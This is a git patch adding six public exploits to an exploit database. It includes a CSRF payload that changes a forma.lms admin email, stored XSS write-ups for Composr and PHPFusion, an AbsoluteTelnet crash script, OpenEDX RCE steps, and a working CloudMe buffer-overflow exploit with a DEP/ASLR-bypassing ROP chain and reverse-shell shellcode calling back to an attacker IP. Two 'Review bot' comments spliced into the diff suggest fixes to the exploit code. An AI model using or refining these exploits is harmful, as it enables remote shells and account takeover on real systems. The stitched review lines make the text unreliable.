From b6194a254f567e24836abc4e83fb2dbe9444d51a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 22 May 2020 05:01:54 +0000 Subject: [PATCH] DB: 2020-05-22 6 changes to exploits/shellcodes AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC) CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email) Composr CMS 10.0.30 - Persistent Cross-Site Scripting PHPFusion 9.03.50 - Persistent Cross-Site Scripting OpenEDX platform Ironwood 2.5 - Remote Code Execution --- exploits/multiple/webapps/48500.txt | 44 ++++++++++ exploits/php/webapps/48494.txt | 47 +++++++++++ exploits/php/webapps/48496.txt | 90 ++++++++++++++++++++ exploits/php/webapps/48497.txt | 78 +++++++++++++++++ exploits/windows/dos/48493.py | 30 +++++++ exploits/windows/local/48499.txt | 126 ++++++++++++++++++++++++++++ files_exploits.csv | 6 ++ 7 files changed, 421 insertions(+) create mode 100644 exploits/multiple/webapps/48500.txt create mode 100644 exploits/php/webapps/48494.txt create mode 100644 exploits/php/webapps/48496.txt create mode 100644 exploits/php/webapps/48497.txt create mode 100755 exploits/windows/dos/48493.py create mode 100644 exploits/windows/local/48499.txt diff --git a/exploits/multiple/webapps/48500.txt b/exploits/multiple/webapps/48500.txt new file mode 100644 index 000000000..23ae9f5a0 --- /dev/null +++ b/exploits/multiple/webapps/48500.txt 
@@ -0,0 +1,44 @@ +# Exploit Title: OpenEDX platform Ironwood 2.5 - Remote Code Execution +# Google Dork: N/A +# Date: 2020-05-20 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: https://open.edx.org/ +# Software Link: https://github.com/edx/edx-platform +# Version: Ironwood 2.5 +# Tested on: Debian x64 +# CVE : CVE-2020-13144 + +CVE ID: CVE-2020-13144 + +OpenEDX Platform Ironwood version 2.5 suffers from a RCE vulnerability when the use of CodeJail (https://github.com/edx/codejail) is not enforced + +This is an authenticated vulnerability, so you need to register an account, go to /edx-studio + +Then Create New course > New section > New subsection > New unit > Add new component > Problem button > Advanced tab > Custom Python evaluated code + +Once here we just need to edit the problem and introduce a payload such as: + + + + + +

Problem text

+ +
+ +
+ + +
+

Solution or Explanation Heading

+

Solution or explanation text

+
+
+
+ +And click Submit, and you will execute commands in the machine \ No newline at end of file diff --git a/exploits/php/webapps/48494.txt b/exploits/php/webapps/48494.txt new file mode 100644 index 000000000..7b6598a0b --- /dev/null +++ b/exploits/php/webapps/48494.txt 
@@ -0,0 +1,47 @@ +# Exploit Title: forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email) +# Date: 2020-05-21 +# Exploit Author: Daniel Ortiz +# Vendor Homepage: https://sourceforge.net/projects/forma/ +# Tested on: XAMPP for Linux 64bit 5.6.40-0 + + +## 1 - Description + +- Vulnerable form: Edit Profile +- Details: The validation of the CSRF token depends on request method. Changing the request method from POST to GET the token validation is omitted by the backend. +- Privileges: It requires admin privileges to change the admin email. +- Location: Admin Area >user profile > Edit form +- Endopoint: /formalms/appCore/index.php?r=lms/profile/show&ap=saveinfo + + +## 2 -Triggering the Vulnerability + +To trigger this vulnerability the admin user must log in to the system. + +1) Setup a HTTP server on the attacker machine, e.g: python -m SimpleHTTPServer 9090 +2) In the attacker machine create a file with this content: + +[+] payload.js + +var target = document.location.host; +var params = "r=lms/profile/show&ap=saveinfo&authentic_request=&up_lastname=&up_firstname=&up_email=hacked@admin.com&user_preference[ui.language]=0&up_signature=&save=Save+changes"; + +function pwnEmail(){ + + var xhr = new XMLHttpRequest(); + xhr.open("GET", "http://" + target + "/formalms/appLms/index.php?"+params, true); + xhr.send(null); + +} + +pwnEmail(); + +3) Edit a course and in the description field put this payload: + + + +The variable "name" it is not sanitized, later, if some user visit the +"Zone editor" area, the XSS is executed, in the response you can view: + +" /> + +V. BUSINESS IMPACT +------------------------- +An attacker can execute arbitrary HTML or Javascript code in a targeted +user's browser, this can leverage to steal sensitive information as user +credentials, personal data, etc. + +VI. SYSTEMS AFFECTED +------------------------- +Composr CMS <= 10.0.30 + +VII. SOLUTION +------------------------- +Disable until a fix is available. + +VIII. 
REFERENCES +------------------------- +https://compo.sr/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +February 06, 2020 1: Initial release +May 21, 2020 2: Last revision + +XI. DISCLOSURE TIMELINE +------------------------- +February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas +February 06, 2020 2: Send to vendor +April 06, 2020 3: New request, vendor doesn't answer. +May 21, 2020 4: Sent to lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/exploits/php/webapps/48497.txt b/exploits/php/webapps/48497.txt new file mode 100644 index 000000000..acad20b77 --- /dev/null +++ b/exploits/php/webapps/48497.txt 
@@ -0,0 +1,78 @@ +# Exploit Title: PHPFusion 9.03.50 - Persistent Cross-Site Scripting +# Date: 2020-05-20 +# Exploit Author: coiffeur +# Vendor Homepage: https://www.php-fusion.co.uk/home.php +# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php +# Version: v9.03.50 + +## How? + +When creating a thread or editing one of his messages with HTML content, it turns out that the injected characters are correctly escaped as it can be seen when I tried here to fuzz the message field with the string `i<3"'ivoire`. + +https://therealcoiffeur.github.io/captures/c5_1.png + +https://therealcoiffeur.github.io/captures/c5_2.png + +https://therealcoiffeur.github.io/captures/c5_3.png + +It's when I became interested in the print feature that things turned out to be interesting. Indeed, the print function allows you to simplify the page as much as possible so that it contains only text. So the print function returns all messages in text format so that the content of a thread can be easily printed (in order to generate this result it is necessary to click on the button circled in blue in figure 3). + +![alt text](../captures/c5_4.png "Figure 5: Injection of HTML character (part 3)") + +![alt text](../captures/c5_5.png "Figure 6: Injection of HTML character (part 3)") + +Once the page is generated by the print functionality we realize by analyzing the body of the server response, that our characters are no longer sanitized. + +Now we just have to create a message that will allow us to execute JavaScript by replacing the contents of the previous message with: + +```html + +``` + +https://therealcoiffeur.github.io/captures/c5_4.png + +https://therealcoiffeur.github.io/captures/c5_5.png + +## Why? + +The route requested to generate this result is the route \/print.php?type=F&item_id=1&rowstart=0. 
It is thus page \/print.php which is called, with the following parameters: + +``` +$_GET array (size=3) + 'type' => string 'F' (length=1) + 'item_id' => string '1' (length=1) + 'rowstart' => string '0' (length=1) +``` + +File: \/print.php +```php + +... + +case "F": + ... + + echo parse_textarea($data['post_message']); + + ... + +``` + + +File: \/includes/core_functions_include.php +```php +function parse_textarea($text, $smileys = TRUE, $bbcode = TRUE, $decode = TRUE, $default_image_folder = IMAGES, $add_line_breaks = FALSE, $descript = TRUE) { + $text = $decode == TRUE ? html_entity_decode(stripslashes($text), ENT_QUOTES, fusion_get_locale('charset')) : $text; + $text = $decode == TRUE ? html_entity_decode($text, ENT_QUOTES, fusion_get_locale('charset')) : $text; // decode for double encoding. + $text = !empty($default_image_folder) ? parse_imageDir($text, $default_image_folder) : $text; + $text = $smileys == TRUE ? parsesmileys($text) : $text; + $text = $bbcode == TRUE ? parseubb($text) : $text; + $text = fusion_parse_user($text); + $text = $add_line_breaks ? nl2br($text) : $text; + $text = $descript == TRUE ? descript($text) : $text; + + return (string)$text; +} +``` + +As you can see by reading the function code of `parse_textarea()`, the text is not sanitized, which leads to the Stored XSS. \ No newline at end of file diff --git a/exploits/windows/dos/48493.py b/exploits/windows/dos/48493.py new file mode 100755 index 000000000..22a9e243e --- /dev/null +++ b/exploits/windows/dos/48493.py 
@@ -0,0 +1,30 @@
+# Exploit Title: AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)
+# Discovered by: Xenofon Vassilakopoulos
+# Discovered Date: 2020-05-21
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe
+# Tested Version: 11.21
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1
+
+# Description: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Run python script
+# 2. - Open absolutetelnet.txt and copy content to clipboard
+# 3. - Open AbsoluteTelnet 11.21
+# 4. - Select "new connection file -> Connection -> SSH2"
+# 5. - Paste the contents at the field "Authentication -> Username"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.21
+# 9. - A new window will appear that prompts you to send an error report
+# 10.- Open absolutetelnet.txt and copy content to clipboard
+# 11.- Paste the contents at the field "Your Email Address (optional)"
+# 12.- press "Send Error Report" button
+# 13.- Crashed
+
+buf = "\x41" * 1000
+f = open ("absolutetelnet.txt", "w")
+f.write(buf)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48499.txt b/exploits/windows/local/48499.txt
new file mode 100644
index 000000000..95fdd109b
--- /dev/null
+++ b/exploits/windows/local/48499.txt
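Review bot: The explicit `f.close()` on the last line of 48493.py is skipped whenever `f.write(buf)` raises, so the handle leaks on the error path, and the `open (...)` call carries a stray space before its parenthesis. A context manager covers both: `with open("absolutetelnet.txt", "w") as f:` followed by `    f.write(buf)`. The written content is unchanged; only the cleanup becomes exception-safe.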
@@ -0,0 +1,126 @@ +# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR) +# Date: 2020-05-20 +# Exploit Author: Xenofon Vassilakopoulos +# Vendor Homepage: https://www.cloudme.com/en +# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe +# Version: CloudMe 1.11.2 +# Tested on: Windows 7 Professional x86 SP1 + +# Steps to reproduce: +# 1. On your local machine start the CloudMe service. +# 2. change the reverse tcp shellcode using the IP and Port of your host using the following command +# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00\x0d\x0a" -f python +# 3. Run the python script. + + +import struct +import socket + +target = "127.0.0.1" + +######################################################################## + +# Get kernel32 address from the stack +# 0022ff8c 77883c45 kernel32!BaseThreadInitThunk+0xe + +rop = struct.pack('L',0x699012c9) # POP EBP # RETN [Qt5Network.dll] +rop+= struct.pack('L',0x0385FF88) # Offset +rop+= struct.pack('L',0x68a9559e) # XCHG EAX,EBP # RETN [Qt5Core.dll] +rop+= struct.pack('L',0x68ae4fe3) # POP ECX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0x0362fffc) # Offset +rop+= struct.pack('L',0x68ad422b) # SUB EAX,ECX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0x68ae8a22) # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll] + +# Calculate VirtualProtect relative to the leaked kernel32 address + +rop+= struct.pack('L',0x68a812c9) # POP EBP # RETN [Qt5Core.dll] +rop+= struct.pack('L',0xfffae493) # Offset +rop+= struct.pack('L',0x61ba8137) # ADD EAX,EBP # RETN [Qt5Gui.dll] + +######################################################################## + +# Setup VirtualProtect + +# edi +rop+= struct.pack('L',0x6d9c23ab) # POP EDI # RETN [Qt5Sql.dll] +rop+= struct.pack('L',0x6d9c1011) # RETN (ROP NOP) [Qt5Sql.dll] + +# esi +rop+= struct.pack('L',0x61b63b3c) # XCHG EAX, ESI # RETN # ptr to virtualprotect + +# edx +rop+= struct.pack('L',0x68d327ff) # POP EAX # POP ECX # RETN [Qt5Core.dll] +rop+= 
struct.pack('L',0xffffffc0) # Value to negate, will become 0x00000040 +rop+= struct.pack('L',0x41414141) # Filler +rop+= struct.pack('L',0x68cef5b2) # NEG EAX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0x68b1df17) # XCHG EAX,EDX # RETN [Qt5Core.dll] + +# ebx +rop+= struct.pack('L',0x68ae7ee3) # POP EAX # RETN [Qt5Core.dll] +rop+= struct.pack('L',0xfffffdff) # Value to negate, will become 0x00000201 +rop+= struct.pack('L',0x6d9e431a) # NEG EAX # RETN [Qt5Sql.dll] +rop+= struct.pack('L',0x68aad07c) # XCHG EAX,EBX # RETN [Qt5Core.dll] + +# ebp +rop+= struct.pack('L',0x6d9c12c9) # POP EBP # RETN [Qt5Sql.dll] +rop+= struct.pack('L',0x6d9c12c9) # skip 4 bytes + +# eax & ecx +rop+= struct.pack('L',0x6fe4dc57) # POP EAX # POP ECX # RETN [libstdc++-6.dll] +rop+= struct.pack('L',0x90909090) # NOP +rop+= struct.pack('L',0x68ee6b16) # &Writable location [Qt5Core.dll] + +# push registers to stack +rop+= struct.pack('L',0x68ef1b07) # PUSHAD # RETN [Qt5Core.dll] + +rop+= struct.pack('L',0x64b4d6cd) # JMP ESP [libwinpthread-1.dll] + + +#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python +buf = b"" +buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31" +buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f" +buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83" +buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff" +buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15" +buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2" +buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99" +buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1" +buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87" +buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78" +buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c" +buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29" +buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7" +buf += 
b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6" +buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1" +buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde" +buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4" +buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16" +buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08" +buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e" +buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae" +buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58" +buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b" +buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb" +buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d" +buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd" +buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b" + +########## + +junk1 = "\x41"*1604 + +nops = "\x90"*16 + +junk2 = "C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1)) + +seh = struct.pack('L',0x6998fb2e) # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Qt5Network.dll] + +payload = junk1 + rop + nops + buf + junk2 + seh + +try: + s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target,8888)) + s.send(payload) +except Exception as e: + print(sys.exc_value) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dd4975b34..aa309a606 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
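Review bot: The `except Exception as e:` handler at the end of 48499.txt prints `sys.exc_value`, but `sys` is never imported (the file imports only `struct` and `socket`) and `exc_value` is a Python 2-only attribute, so a failed `connect` or `send` would be reported as a NameError or AttributeError rather than the socket error itself; `print(e)` reports the caught exception on either interpreter. The socket is also never closed on the success path; an explicit `s.close()` after `s.send(payload)` would release it.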
@@ -6732,6 +6732,7 @@ id,file,description,date,author,type,platform,port
 48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
 48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
 48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,
+48493,exploits/windows/dos/48493.py,"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)",2020-05-21,"Xenofon Vassilakopoulos",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11074,6 +11075,7 @@ id,file,description,date,author,type,platform,port
 48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows,
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
+48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42722,3 +42724,7 @@ id,file,description,date,author,type,platform,port
 48489,exploits/php/webapps/48489.txt,"NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)",2020-05-19,JEBARAJ,webapps,php,
 48490,exploits/php/webapps/48490.txt,"Victor CMS 1.0 - Authenticated Arbitrary File Upload",2020-05-19,"Kishan Lal Choudhary",webapps,php,
 48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,
+48494,exploits/php/webapps/48494.txt,"forma.lms 5.6.40 - Cross-Site Request Forgery (Change Admin Email)",2020-05-21,"Daniel Ortiz",webapps,php,
+48496,exploits/php/webapps/48496.txt,"Composr CMS 10.0.30 - Persistent Cross-Site Scripting",2020-05-21,"Manuel García Cárdenas",webapps,php,
+48497,exploits/php/webapps/48497.txt,"PHPFusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-21,coiffeur,webapps,php,
+48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,